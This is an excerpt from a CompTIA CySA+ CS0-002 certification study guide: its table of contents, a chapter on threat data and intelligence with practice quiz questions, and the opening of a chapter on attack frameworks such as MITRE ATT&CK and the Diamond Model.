Uploaded by shadowreaper79

dokumen.pub comptia-cybersecurity-analyst-cysa-cs0-002-cert-guide-2ed-edition-2nbsped-9780136747000

advertisement
CompTIA Cybersecurity
Analyst (CySA+) CS0-002
Cert Guide
Troy McMillan
(troy.mcmillan@cybervista.net)
Contents at a Glance
1 The Importance of Threat Data and
Intelligence
2 Utilizing Threat Intelligence to Support
Organizational Security
3 Vulnerability Management Activities
4 Analyzing Assessment Output
5 Threats and Vulnerabilities Associated
with Specialized Technology
6 Threats and Vulnerabilities Associated
with Operating in the Cloud
7 Implementing Controls to Mitigate Attacks
and Software Vulnerabilities
8 Security Solutions for Infrastructure
Management
9 Software Assurance Best Practices
10 Hardware Assurance Best Practices
11 Analyzing Data as Part of Security
Monitoring Activities
12 Implementing Configuration Changes to
Existing Controls to Improve
Security
13 The Importance of Proactive Threat
Hunting
14 Automation Concepts and Technologies
15 The Incident Response Process
16 Applying the Appropriate Incident
Response Procedure
17 Analyzing Potential Indicators of
Compromise
18 Utilizing Basic Digital Forensics
Techniques
19 The Importance of Data Privacy and
Protection
20 Applying Security Concepts in Support of
Organizational Risk Mitigation
21 The Importance of Frameworks, Policies,
Procedures, and Controls
22 Final Preparation
Appendix A, Answers to the "Do I Know This
Already?" Quizzes and Review
Questions
Appendix B, CompTIA Cybersecurity Analyst
(CySA+) CS0-002 Cert Guide Exam
Updates
Glossary of Key Terms
Appendix C, Memory Tables
Appendix D, Memory Tables Answer Key
Appendix E, Study Planner
Contents
Chapter 1. The Importance of Threat Data
and Intelligence
“Do I Know This Already?” Quiz
Foundation Topics
Intelligence Sources
Indicator Management
Threat Classification
Threat Actors
Intelligence Cycle
Commodity Malware
Information Sharing and Analysis
Communities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 2. Utilizing Threat Intelligence to
Support Organizational Security
“Do I Know This Already?” Quiz
Foundation Topics
Attack Frameworks
Threat Research
Threat Modeling Methodologies
Threat Intelligence Sharing with Supported
Functions
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 3. Vulnerability Management
Activities
“Do I Know This Already?” Quiz
Foundation Topics
Vulnerability Identification
Validation
Remediation/Mitigation
Scanning Parameters and Criteria
Inhibitors to Remediation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 4. Analyzing Assessment Output
“Do I Know This Already?” Quiz
Foundation Topics
Web Application Scanner
Infrastructure Vulnerability Scanner
Software Assessment Tools and Techniques
Enumeration
Wireless Assessment Tools
Cloud Infrastructure Assessment Tools
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 5. Threats and Vulnerabilities
Associated with Specialized
Technology
“Do I Know This Already?” Quiz
Foundation Topics
Mobile
Internet of Things (IoT)
Embedded Systems
Real-Time Operating System (RTOS)
System-on-Chip (SoC)
Field Programmable Gate Array (FPGA)
Physical Access Control
Building Automation Systems
Vehicles and Drones
Workflow and Process Automation Systems
Incident Command System (ICS)
Supervisory Control and Data Acquisition
(SCADA)
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 6. Threats and Vulnerabilities
Associated with Operating in the
Cloud
“Do I Know This Already?” Quiz
Foundation Topics
Cloud Deployment Models
Cloud Service Models
Function as a Service (FaaS)/Serverless
Architecture
Infrastructure as Code (IaC)
Insecure Application Programming Interface
(API)
Improper Key Management
Unprotected Storage
Logging and Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 7. Implementing Controls to
Mitigate Attacks and Software
Vulnerabilities
“Do I Know This Already?” Quiz
Foundation Topics
Attack Types
Vulnerabilities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 8. Security Solutions for
Infrastructure Management
“Do I Know This Already?” Quiz
Foundation Topics
Cloud vs. On-premises
Asset Management
Segmentation
Network Architecture
Change Management
Virtualization
Containerization
Identity and Access Management
Cloud Access Security Broker (CASB)
Honeypot
Monitoring and Logging
Encryption
Certificate Management
Active Defense
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 9. Software Assurance Best
Practices
Chapter 10. Hardware Assurance Best
Practices
“Do I Know This Already?” Quiz
Foundation Topics
Hardware Root of Trust
eFuse
Unified Extensible Firmware Interface
(UEFI)
Trusted Foundry
Secure Processing
Anti-Tamper
Self-Encrypting Drives
Trusted Firmware Updates
Measured Boot and Attestation
Bus Encryption
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 11. Analyzing Data as Part of
Security Monitoring Activities
Chapter 12. Implementing Configuration
Changes to Existing Controls to
Improve Security
“Do I Know This Already?” Quiz
Foundation Topics
Permissions
Whitelisting and Blacklisting
Firewall
Intrusion Prevention System (IPS) Rules
Data Loss Prevention (DLP)
Endpoint Detection and Response (EDR)
Network Access Control (NAC)
Sinkholing
Malware Signatures
Sandboxing
Port Security
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 13. The Importance of Proactive
Threat Hunting
“Do I Know This Already?” Quiz
Foundation Topics
Establishing a Hypothesis
Profiling Threat Actors and Activities
Threat Hunting Tactics
Reducing the Attack Surface Area
Bundling Critical Assets
Attack Vectors
Integrated Intelligence
Improving Detection Capabilities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 14. Automation Concepts and
Technologies
“Do I Know This Already?” Quiz
Foundation Topics
Workflow Orchestration
Scripting
Application Programming Interface (API)
Integration
Automated Malware Signature Creation
Data Enrichment
Threat Feed Combination
Machine Learning
Use of Automation Protocols and Standards
Continuous Integration
Continuous Deployment/Delivery
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 15. The Incident Response Process
“Do I Know This Already?” Quiz
Foundation Topics
Communication Plan
Response Coordination with Relevant
Entities
Factors Contributing to Data Criticality
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 16. Applying the Appropriate
Incident Response Procedure
“Do I Know This Already?” Quiz
Foundation Topics
Preparation
Detection and Analysis
Containment
Eradication and Recovery
Post-Incident Activities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 17. Analyzing Potential Indicators of
Compromise
“Do I Know This Already?” Quiz
Foundation Topics
Network-Related Indicators of Compromise
Host-Related Indicators of Compromise
Application-Related Indicators of
Compromise
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 18. Utilizing Basic Digital Forensics
Techniques
“Do I Know This Already?” Quiz
Foundation Topics
Network
Endpoint
Mobile
Cloud
Virtualization
Legal Hold
Procedures
Hashing
Carving
Data Acquisition
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 19. The Importance of Data Privacy
and Protection
“Do I Know This Already?” Quiz
Foundation Topics
Privacy vs. Security
Non-technical Controls
Technical Controls
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 20. Applying Security Concepts in
Support of Organizational Risk
Mitigation
“Do I Know This Already?” Quiz
Foundation Topics
Business Impact Analysis
Risk Identification Process
Risk Calculation
Communication of Risk Factors
Risk Prioritization
Systems Assessment
Documented Compensating Controls
Training and Exercises
Supply Chain Assessment
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 21. The Importance of Frameworks,
Policies, Procedures, and Controls
Chapter 22. Final Preparation
Exam Information
Getting Ready
Tools for Final Preparation
Suggested Plan for Final Review/Study
Summary
Appendix A. Answers to the “Do I Know This
Already?” Quizzes and Review
Questions
Appendix B. CompTIA Cybersecurity
Analyst (CySA+) CS0-002 Cert
Guide Exam Updates
Glossary of Key Terms
Appendix C. Memory Tables
Appendix D. Memory Tables Answer Key
Appendix E. Study Planner
Chapter 1. The Importance
of Threat Data and
Intelligence
This chapter covers the following topics related
to Objective 1.1 (Explain the importance of threat
data and intelligence) of the CompTIA
Cybersecurity Analyst (CySA+) CS0-002
certification exam:
• Intelligence sources: Examines open-source
intelligence, proprietary/closed-source
intelligence, timeliness, relevancy, and accuracy
• Confidence levels: Covers the importance of
identifying levels of confidence in data
• Indicator management: Introduces Structured
Threat Information eXpression (STIX), Trusted
Automated eXchange of Indicator Information
(TAXII), and OpenIOC
• Threat classification: Investigates known
threats vs. unknown threats, zero-day threats, and
advanced persistent threats
• Threat actors: Identifies actors such as nationstate, hacktivist, organized crime, and intentional
and unintentional insider threats
• Intelligence cycle: Explains the requirements,
collection, analysis, dissemination, and feedback
stages
• Commodity malware: Describes the types of
malware that commonly infect networks
• Information sharing and analysis
communities: Discusses data sharing among
members of healthcare, financial, aviation,
government, and critical infrastructure
communities
When a war is fought, the gathering and processing of
intelligence information is critical to the success of a
campaign. Likewise, when conducting the daily war that
comprises the defense of an enterprise’s security, threat
intelligence can be the difference between success and
failure. This opening chapter discusses the types of
threat intelligence, the sources and characteristics of
such data, and common threat classification systems.
This chapter also discusses the threat cycle, common
malware, and systems of information sharing among
enterprises.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these seven self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 1-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 1-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure
of the answer, you should mark that question as wrong for purposes of the selfassessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. Which of the following is an example of closedsource intelligence?
a. Internet blogs and discussion groups
b. Print and online media
c. Unclassified government data
d. Platforms maintained by private organizations
2. Which of the following is an application protocol
for exchanging cyber threat information over
HTTPS?
a. TAXII
b. STIX
c. OpenIOC
d. OSINT
3. Which of the following are threats discovered in
live environments that have no current fix or
patch?
a. Known threats
b. Zero-day threats
c. Unknown threats
d. Advanced persistent threats
4. Which of the following threat actors uses attacks as
a means to get their message out and affect the
businesses that they feel are detrimental to their
cause?
a. Organized crime
b. Terrorist group
c. Hacktivist
d. Insider threat
5. In which stage of the intelligence cycle does most of
the hard work occur?
a. Requirements
b. Collection
c. Dissemination
d. Analysis
6. Malware that is widely available for either purchase
or by free download is called what?
a. Advanced
b. Commodity
c. Bulk
d. Proprietary
7. Which of the following information sharing and
analysis communities is driven by the requirements
of HIPAA?
a. H-ISAC
b. Financial Services Information Sharing and
Analysis Center
c. Aviation Government Coordinating Council
d. ENISA
FOUNDATION TOPICS
INTELLIGENCE SOURCES
Threat intelligence comes in many forms and can be
obtained from a number of different sources. When
gathering this critical data, the security professional
should always classify the information with respect to its
timeliness and relevancy. Let’s look at some types of
threat intelligence and the process of attaching a
confidence level to the data.
Open-Source Intelligence
Open-source intelligence (OSINT) consists of
information that is publicly available to everyone, though
not everyone knows that it is available. OSINT comes
from public search engines, social media sites,
newspapers, magazine articles, or any source that does
not limit access to that information. Examples of these
sources include the following:
• Print and online media
• Internet blogs and discussion groups
• Unclassified government data
• Academic and professional publications
• Industry group data
• Papers and reports that are unpublished (gray
data)
Proprietary/Closed-Source
Intelligence
Proprietary/closed-source intelligence sources
are those that are not publicly available and usually
require a fee to access. Examples of these sources are
platforms maintained by private organizations that
supply constantly updating intelligence information. In
many cases this data is developed from all of the
provider’s customers and other sources.
An example of such a platform is offered by CYFIRMA, a
market leader in predictive cyber threat visibility and
intelligence. CYFIRMA announced the launch of cloudbased Cyber Intelligence Analytics Platform (CAP) v2.0.
In 2019, using its proprietary artificial intelligence and
machine learning algorithms, CYFIRMA helping
organizations unravel cyber risks and threats and enable
proactive cyber posture management.
Timeliness
One of the considerations when analyzing intelligence
data (of any kind, not just cyber data) is the timeliness
of such data. Obviously, if an organization receives threat
data that is two weeks old, quite likely it is too late to
avoid that threat. One of the attractions of closed-source
intelligence is that these platforms typically provide near
real-time alerts concerning such threats.
Relevancy
Intelligence data can be quite voluminous. The vast
majority of this information is irrelevant to any specific
organization. One of the jobs of the security professional
is to ascertain which data is relevant and which is not.
Again, many proprietary platforms allow for searching
and organizing the data to enhance its relevancy.
Confidence Levels
While timeliness and relevancy are key characterizes to
evaluate with respect to intelligence, the security
professional must also make an assessment as to the
confidence level attached to the data. That is, can it be
relied on to predict the future or to shed light on the
past? On a more basic level, is it true? Or was the data
developed to deceive or mislead? Many cyber activities
have as their aim to confuse, deceive, and hide activities.
Accuracy
Finally, the security professional must determine
whether the intelligence is correct (accuracy).
Newspapers are full these days of cases of false
intelligence. The most basic example of this is the hoax
email containing a false warning of a malware infection
on the local device. While the email is false in many cases
it motivates the user to follow a link to free software that
actually installs malware. Again, many cyber attacks use
false information to misdirect network defenses.
INDICATOR MANAGEMENT
Cybersecurity professionals use indicators of
compromise (IOC) to identify potential threats. IOCs are
network events that are known to either precede or
accompany an attack of some sort. Managing the
collection and analysis of these indicators can be a major
headache. Indicator management systems have been
developed to make this process somewhat easier. These
systems also provide insight into indicators present in
other networks that may not yet be present in your
enterprise, providing somewhat of an early-warning
system. Let’s look at some examples of these platforms.
Structured Threat Information
eXpression (STIX)
Structured Threat Information eXpression
(STIX) is an XML-based programming language that
can be used to communicate cybersecurity data among
those using the language. It provides a common language
for this communication.
STIX was created with several core purposes in mind:
• To identify patterns that could indicate cyber
threats
• To help facilitate cyber threat response activities,
including prevention, detection, and response
• The sharing of cyber threat information within an
organization and with outside partners or
communities that benefit from the information
While STIX was originally sponsored by the Office of
Cybersecurity and Communications (CS&C) within the
U.S. Department of Homeland Security (DHS), it is now
under the management of the Organization for the
Advancement of Structured Information Standards
(OASIS), a nonprofit consortium that seeks to advance
the development, convergence, and adoption of open
standards for the Internet.
Trusted Automated eXchange of
Indicator Information (TAXII)
Trusted Automated eXchange of Indicator
Information (TAXII) is an application protocol for
exchanging cyber threat information (CTI) over HTTPS.
It defines two primary services, Collections and
Channels. Figure 1-1 shows the Collection service. A
Collection is an interface to a logical repository of CTI
objects provided by a TAXII Server that allows a
producer to host a set of CTI data that can be requested
by consumers: TAXII Clients and Servers exchange
information in a request-response model.
Figure 1-1 Collection Service
Figure 1-2 shows a Channel service. Maintained by a
TAXII Server, a Channel allows producers to push data
to many consumers and allows consumers to receive data
from many producers: TAXII Clients exchange
information with other TAXII Clients in a publishsubscribe model.
Figure 1-2 Channel Service
These TAXII services can support a variety of common
sharing models:
• Hub and spoke: One central clearinghouse
• Source/subscriber: One organization is the
single source of information
• Peer-to-peer: Multiple organizations share their
information
OpenIOC
OpenIOC (Open Indicators of Compromise) is an open
framework designed for sharing threat intelligence
information in a machine-readable format. It is a simple
framework that is written in XML, which can be used to
document and classify forensic artifacts. It comes with a
base set of 500 predefined indicators, as provided by
Mandiant (a U.S. cybersecurity firm later acquired by
FireEye).
THREAT CLASSIFICATION
After threat data has been collected though a
vulnerability scan or through an alert, it must be
correlated to an attack type and classified as to its
severity and scope, based on how widespread the
incident appears to be and the types of data that have
been put at risk. This helps in the prioritization process.
Much as in the triage process in a hospital, incidents are
not handled in the order in which they are received or
detected; rather, the most dangerous issues are
addressed first, and prioritization occurs constantly.
When determining vulnerabilities and threats to an
asset, considering the threat actors first is often easiest.
Threat actors can be grouped into the following six
categories:
• Human: Includes both malicious and
nonmalicious insiders and outsiders, terrorists,
spies, and terminated personnel
• Natural: Includes floods, fires, tornadoes,
hurricanes, earthquakes, and other natural
disasters or weather events
• Technical: Includes hardware and software
failure, malicious code, and new technologies
• Physical: Includes CCTV issues, perimeter
measures failure, and biometric failure
• Environmental: Includes power and other
utility failure, traffic issues, biological warfare,
and hazardous material issues (such as spillage)
• Operational: Includes any process or procedure
that can affect confidentiality, integrity, and
availability (CIA)
When the vulnerabilities and threats have been
identified, the loss potential for each must be
determined. This loss potential is determined by using
the likelihood of the event combined with the impact that
such an event would cause. An event with a high
likelihood and a high impact would be given more
importance than an event with a low likelihood and a low
impact. Different types of risk analysis should be used to
ensure that the data that is obtained is maximized. Once
an incident has been placed into one of these
classifications, options that are available for that
classification are considered. The following sections look
at three common classifications that are used.
Known Threat vs. Unknown Threat
In the cybersecurity field, known threats are threats
that are common knowledge and easily identified
through signatures by antivirus and intrusion detection
system (IDS) engines or through domain reputation
blacklists. Unknown threats, on the other hand, are
lurking threats that may have been identified but for
which no signatures are available. We are not completely
powerless against these threats. Many security products
attempt to locate these threats through static and
dynamic file analysis. This may occur in a sandboxed
environment, which protects the system that is
performing the analysis. In some cases, unknown threats
are really old threats that have been recycled. Because
security products have limited memory with regard to
threat signatures, vendors must choose the most current
attack signatures to include. Therefore, old attack
signatures may be missing in newer products, which
effectively allows old known threats to reenter the
unknown category.
Zero-day
In many cases, vulnerabilities discovered in live
environments have no current fix or patch. Such a
vulnerability is referred to as zero-day vulnerability.
The best way to prevent zero-day attacks is to write bugfree applications by implementing efficient designing,
coding, and testing practices. Having staff discover zeroday vulnerabilities is much better than having those
looking to exploit the vulnerabilities find them.
Monitoring known hacking community websites can
often help you detect attacks early because hackers often
share zero-day exploit information.
Honeypots or honeynets can also provide forensic
information about hacker methods and tools for zero-day
attacks. New zero-day attacks against a broad range of
technology systems are announced on a regular basis. A
security manager should create an inventory of
applications and maintain a list of critical systems to
manage the risks of these attack vectors.
Because zero-day attacks occur before a fix or patch has
been released, preventing them is difficult. As with many
other attacks, keeping all software and firmware up to
date with the latest updates and patches is important.
Enabling audit logging of network traffic can help
reconstruct the path of a zero-day attack. Security
professionals can inspect logs to determine the presence
of an attack in the network, estimate the damage, and
identify corrective actions. Zero-day attacks usually
involve activity that is outside “normal” activity, so
documenting normal activity baselines is important.
Also, routing traffic through a central internal security
service can ensure that any fixes affect all the traffic in
the most effective manner. Whitelisting can also aid in
mitigating attacks by ensuring that only approved
entities are able to use certain applications or complete
certain tasks. Finally, security professionals should
ensure that the organization implements the appropriate
backup schemes to ensure that recovery can be achieved,
thereby providing remediation from the attack.
Advanced Persistent Threat
An advanced persistent threat (APT) is a hacking
process that targets a specific entity and is carried out
over a long period of time. In most cases, the victim of an
APT is a large corporation or government entity. The
attacker is usually an organized, well-funded group of
highly skilled individuals, sometimes sponsored by a
nation-state. The attackers have a predefined objective.
Once the objective is met, the attack is halted. APTs can
often be detected by monitoring logs and performance
metrics. While no defensive actions are 100% effective,
the following actions may help mitigate many APTs:
• Use application whitelisting to help prevent
malicious software and unapproved programs
from running.
• Patch applications such as Java, PDF viewers,
Flash, web browsers, and Microsoft Office
products.
• Patch operating system vulnerabilities.
• Restrict administrative privileges to operating
systems and applications, based on user duties.
THREAT ACTORS
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or
absent access control list (ACL) is a threat actor. Keep in
mind, though, that threat actors can discover and/or
exploit vulnerabilities. Not all threat actors will actually
exploit an identified vulnerability.
The Federal Bureau of Investigation (FBI) has identified
three categories of threat actors: nations-state or state
sponsors, organized crime, and terrorist groups.
Nation-state
Nation-state or state sponsors are usually foreign
governments. They are interested in pilfering data,
including intellectual property and research and
development data, from major manufacturers, tech
companies, government agencies, and defense
contractors. They have the most resources and are the
best organized of any of the threat actor groups.
Organized Crime
Organized crime groups primarily threaten the financial
services sector and are expanding the scope of their
attacks. They are well financed and organized.
Terrorist Groups
Terrorist groups want to impact countries by using the
Internet and other networks to disrupt or harm the
viability of a society by damaging its critical
infrastructure.
Hacktivist
While not mentioned by the FBI, hacktivists are activists
for a cause, such as animal rights, that use hacking as a
means to get their message out and affect the businesses
that they feel are detrimental to their cause.
Insider Threat
Insider threats should be one of the biggest concerns for
security personnel. Insiders have knowledge of and
access to systems that outsiders do not have, giving
insiders a much easier avenue for carrying out or
participating in an attack. An organization should
implement the appropriate event collection and log
review policies to provide the means to detect insider
threats as they occur. These threats fall into two
categories, intentional and unintentional.
Intentional
Intentional insider threats are insiders who have ill
intent. These folks typically either are disgruntled over
some perceived slight or are working for another
organization to perform corporate espionage. They may
share sensitive documents with others or they may
impart knowledge used to breach a network. This is one
of the reasons that users’ permissions and rights must
not exceed those necessary to perform their jobs. This
helps to limit the damage an insider might inflict.
Unintentional
Sometimes internal users unknowingly increase the
likelihood that security breaches will occur. Such
unintentional insider threats do not have malicious
intent; they simply do not understand how system
changes can affect security.
Security awareness and training should include coverage
of examples of misconfigurations that can result in
security breaches occurring and/or not being detected.
For example, a user may temporarily disable antivirus
software to perform an administrative task. If the user
fails to reenable the antivirus software, he unknowingly
leaves the system open to viruses. In such a case, an
organization should consider implementing group
policies or some other mechanism to periodically ensure
that antivirus software is enabled and running. Another
solution could be to configure antivirus software to
automatically restart after a certain amount of time.
Recording and reviewing user actions via system, audit,
and security logs can help security professionals identify
misconfigurations so that the appropriate policies and
controls can be implemented.
INTELLIGENCE CYCLE
Intelligence activities of any sort, including cyber
intelligence functions, should follow a logical process
developed over years by those in the business. The
intelligence cycle model specified in exam objective 1.1
contains five stages:
1. Requirements: Before beginning intelligence
activities, security professionals must identify what
the immediate issue is and define as closely as
possible the requirements of the information that
needs to be collected and analyzed. This means the
types of data to be sought are driven by the types of
issues with which we are concerned. The amount of
potential information may be so vast that unless we
filter it to what is relevant, we may be unable to
fully understand what is occurring in the
environment.
2. Collection: This is the stage in which most of the
hard work occurs. It is also the stage at which
recent advances in artificial intelligence (AI) and
automation have changed the game. Collection is
time-consuming work that involves web searches,
interviews, identifying sources, and monitoring, to
name a few activities. New tools automate data
searching, organizing, and presenting information
in easy-to-view dashboards.
3. Analysis: In this stage, data is combed and
analyzed to identify pieces of information that have
the following characteristics:
• Timely: Can be tied to the issue from a time
standpoint
• Actionable: Suggests or leads to a proper
mitigation
• Consistent: Reduces uncertainty surrounding
an issue
This is the stage in which the skills of the security
professional have the most impact, because the ability to
correlate data with issues requires keen understanding of
vulnerabilities, their symptoms, and solutions.
4. Dissemination: Hopefully analysis leads to a
solution or set of solutions designed to prevent
issues. These solutions, be they policies, scripts, or
configuration changes, must be communicated to
the proper personnel for deployment. The security
professional acts as the designer and the network
team acts as the builder of the solution. In the case
of policy changes, the human resources (HR) team
acts as the builder.
5. Feedback: Gathering feedback on the intelligence
cycle before the next cycle begins is important so
that improvements can be defined. What went
right? What worked? What didn’t? Was the
analysis stage performed correctly? Was the
dissemination process clear and timely?
Improvements can almost always be identified.
COMMODITY MALWARE
Commodity malware is malware that is widely
available either for purchase or by free download. It is
not customized or tailored to a specific attack. It does not
require complete understanding of its processes and is
used by a wide range of threat actors with a range of skill
levels. Although no clear dividing line exists between
commodity malware and what is called advanced
malware (and in fact the lines are blurring more all the
time), generally we can make a distinction based on the
skill level and motives of the threat actors who use the
malware. Less-skilled threat actors (script kiddies, etc.)
utilize these prepackaged commodity tools, whereas
more-skilled threat actors (APTs, etc.) typically
customize their attack tools to make them more effective
in a specific environment. The motives of those who
employ commodity malware tend to be gaining
experience in hacking and experimentation.
INFORMATION SHARING
AND ANALYSIS
COMMUNITIES
Over time, security professionals have developed
methods and platforms for sharing the cybersecurity
information they have developed. Some information
sharing and analysis communities focus on specific
industries while others simply focus on critical issues
common to all:
• Healthcare: In the healthcare community, where
protection of patient data is legally required by the
Health Insurance Portability and Accountability
Act (HIPAA), an example of a sharing platform is
the Health Information Sharing and Analysis
Center (H-ISAC). It is a global operation focused
on sharing timely, actionable, and relevant
information among its members, including
intelligence on threats, incidents, and
vulnerabilities. This sharing of information can be
done on a human-to-human or machine-tomachine basis.
• Financial: The financial services sector is under
pressure to protect financial records with laws
such as the Financial Services Modernization Act
of 1999, commonly known as the Gramm-LeachBliley Act (GLBA. The Financial Services
Information Sharing and Analysis Center (FSISAC) is an industry consortium dedicated to
reducing cyber risk in the global financial system.
It shares among its members and trusted sources
critical cyber intelligence, and builds awareness
through summits, meetings, webinars, and
communities of interest.
• Aviation: In the area of aviation, the U.S.
Department of Homeland Security’s Cybersecurity
and Infrastructure Security Agency (CISA)
maintains a number of chartered organizations,
among them the Aviation Government
Coordinating Council (AGCC). Its charter
document reads “The AGCC coordinates
strategies, activities, policy and communications
across government entities within the Aviation
Sub-Sector. The AGCC acts as the government
counterpart to the private industry-led ‘Aviation
Sector Coordinating Council’ (ASCC).” The
Aviation Sector Coordinating Council is an
example of a private sector counterpart.
• Government: For government agencies, the
aforementioned CISA also shares information
with state, local, tribal, and territorial
governments and with international partners, as
cybersecurity threat actors are not constrained by
geographic boundaries. As CISA describes itself
on the Department of Homeland Security website,
“CISA is the Nation’s risk advisor, working with
partners to defend against today’s threats and
collaborating to build more secure and resilient
infrastructure for the future.”
• Critical infrastructure: All of the previously
mentioned platforms and organizations are
dedicated to helping organizations protect their
critical infrastructure. As an example of
international cooperation, the European Union
Agency for Network and Information Security
(ENISA) is a center of network and information
security expertise for the European Union (EU).
ENISA describes itself as follows: “ENISA works
with these groups to develop advice and
recommendations on good practice in information
security. It assists Member States in
implementing relevant EU legislation and works
to improve the resilience of Europe’s critical
information infrastructure and networks. ENISA
seeks to enhance existing expertise in member
states by supporting the development of crossborder communities committed to improving
network and information security throughout the
EU.” More information about ENISA and its work
can be found at https://www.enisa.europa.eu.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 1-2 lists a reference of these key topics and the
page number on which each is found.
Table 1-2 Key Topics
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
open-source intelligence
proprietary/closed-source intelligence
timeliness
relevancy
confidence levels
accuracy
indicator management
Structured Threat Information eXpression (STIX)
Trusted Automated eXchange of Indicator Information
(TAXII)
OpenIOC
known threats
unknown threats
zero-day threats
advanced persistent threat
collection
analysis
dissemination
commodity malware
REVIEW QUESTIONS
1. Give at least two examples of open-source
intelligence data.
2. ________________ is an open framework that
is designed for sharing threat intelligence
information in a machine-readable format.
3. Match the following items with the correct
definition.
4. Which threat actor has already performed network
penetration?
5. List the common sharing models used in TAXII.
6. ________________are hacking for a cause,
such as for animal rights, and use hacking as a
means to get their message out and affect the
businesses that they feel are detrimental to their
cause.
7. Match the following items with their definition.
8. APT attacks are typically sourced from which group
of threat actors?
9. What intelligence gathering step is necessary
because the amount of potential information may
be so vast?
10. The Aviation Government Coordinating Council is
chartered by which organization?
Chapter 2. Utilizing Threat
Intelligence to Support
Organizational Security
This chapter covers the following topics related
to Objective 1.2 (Given a scenario, utilize threat
intelligence to support organizational security)
of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
• Attack frameworks: Introduces the MITRE
ATT&CK framework, the Diamond Model of
Intrusion Analysis, and the kill chain
• Threat research: Covers reputational and
behavioral research, indicators of compromise
(IoC), and the Common Vulnerability Scoring
System (CVSS)
• Threat modeling methodologies: Discusses
the concepts of adversary capability, total attack
surface, attack vector, impact, and likelihood
• Threat intelligence sharing with supported
functions: Describes intelligence sharing with
the functions incident response, vulnerability
management, risk management, security
engineering, and detection and monitoring
Threat intelligence comprises information gathered that
does one of the following things:
• Educates and warns you about potential dangers
not yet seen in the environment
• Identifies behavior that accompanies malicious
activity
• Alerts you of ongoing malicious activity
However, possessing threat intelligence is of no use if it
is not converted into concrete activity that responds to
and mitigates issues. This chapter discusses how to
utilize threat intelligence to support organizational
security.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these four self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 2-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 2-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
1. Which of the following is a knowledge base of
adversary tactics and techniques based on realworld observations?
a. Diamond Model
b. OWASP
c. MITRE ATT&CK
d. STIX
2. Which of the following threat intelligence data
types is generated from past activities?
a. Reputational
b. Behavioral
c. Heuristics
d. Anticipatory
3. Your team has identified that a recent breach was
sourced by a disgruntled employee. What part of
threat modeling is being performed by such
identification?
a. Total attack surface
b. Impact
c. Adversary capability
d. Attack vector
4. Which of the following functions uses shared threat
intelligence data to build in security for new
products and solutions?
a. Incident response
b. Security engineering
c. Vulnerability management
d. Risk management
FOUNDATION TOPICS
ATTACK FRAMEWORKS
Many organizations have developed security
management frameworks and methodologies to help
guide security professionals. These attack
frameworks and methodologies include security
program development standards, enterprise and security
architecture development frameworks, security control
development methods, corporate governance methods,
and process management methods. The following
sections discuss major frameworks and methodologies
and explain where they are used.
MITRE ATT&CK
MITRE ATT&CK is a knowledge base of adversary
tactics and techniques based on real-world observations.
It is an open system, and attack matrices based on it
have been created for various industries. It is designed as
a foundation for the development of specific threat
models and methodologies in the private sector, in
government, and in the cybersecurity product and
service community.
An example of such a matrix is the SaaS Matrix created
for organizations utilizing Software as a Service (SaaS),
shown in Table 2-2. The corresponding matrix on the
MITRE ATT&CK website is interactive
(https://attack.mitre.org/matrices/enterprise/cloud/saa
s/), and when you click the name of an attack technique
in a cell, a new page opens with a detailed explanation of
that attack technique. For more information about the
MITRE ATT&CK Matrix for Enterprise and to view the
matrices it provides for other platforms (Windows,
macOS, etc.), see
https://attack.mitre.org/matrices/enterprise/.
Table 2-2 ATT&CK Matrix for SaaS
The Diamond Model of Intrusion
Analysis
The Diamond Model of Intrusion Analysis
emphasizes the relationships and characteristics of four
basic components: the adversary, capabilities,
infrastructure, and victims. The main axiom of this
model states, “For every intrusion event there exists an
adversary taking a step towards an intended goal by
using a capability over infrastructure against a victim to
produce a result.”
